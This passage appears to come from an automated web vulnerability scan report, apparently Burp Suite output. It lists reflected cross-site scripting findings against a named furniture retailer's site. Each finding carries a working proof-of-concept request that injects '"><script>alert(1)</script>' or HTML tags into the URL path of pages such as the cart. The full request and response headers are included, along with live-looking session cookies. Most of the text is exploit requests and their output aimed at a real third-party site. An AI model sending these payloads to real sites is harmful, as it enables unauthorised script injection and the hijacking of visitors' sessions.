GET /cart.phpeebbf<a>140c6ba9346 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2e05"><script>alert(1)</script>0b53e75a9c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.phpe2e05"><script>alert(1)</script>0b53e75a9c8 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:15 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11976
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
3.379. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.hertzfurniture.com
Path: /cart.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b3c"><script>alert(1)</script>7b1f51b6164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.php/a7b3c"><script>alert(1)</script>7b1f51b6164 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:35 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/ Vary: User-Agent Content-Length: 13695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
3.380. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.hertzfurniture.com
Path: /cart.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f9226<a>6734d7358b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cart.php/f9226<a>6734d7358b7 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/ Vary: User-Agent Content-Length: 13647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 471bc"><script>alert(1)</script>422ffc091eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.php471bc"><script>alert(1)</script>422ffc091eb/1' HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:13 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0de7<a>588021ee9a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cart.phpf0de7<a>588021ee9a7/1' HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:58 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21a6d<a>696843c7ff6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cart.php/1'21a6d<a>696843c7ff6 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffc67"><script>alert(1)</script>7677760fccf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.php/1'ffc67"><script>alert(1)</script>7677760fccf HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:27 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1b20"><script>alert(1)</script>2193666e451 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /church-furniture.htmlc1b20"><script>alert(1)</script>2193666e451 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/cart.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; cartId=31f312284fec0a02f7a8e5e805e7d277; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.15.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12002
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 287f2<a>6d0fd0479bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /church-furniture.html287f2<a>6d0fd0479bd HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/cart.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; cartId=31f312284fec0a02f7a8e5e805e7d277; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.15.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11954
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cabf0"><script>alert(1)</script>4a2a3d4ad2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 622b0<a>72d0ba4ff3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d918"><script>alert(1)</script>6766ec5650a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c23a5<a>683866ed79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9ce4<a>ddb5eb40b1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/jqModalDef.cssb9ce4<a>ddb5eb40b1d?v=1.0 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:33:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/ Vary: User-Agent Content-Length: 11948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f042"><script>alert(1)</script>b8a07902a78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/jqModalDef.css1f042"><script>alert(1)</script>b8a07902a78?v=1.0 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:02:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/ Vary: User-Agent Content-Length: 11996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7acf7"><script>alert(1)</script>1527c3eba87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1f7b6<a>ab28509deab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55efd"><script>alert(1)</script>6050ea0498 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
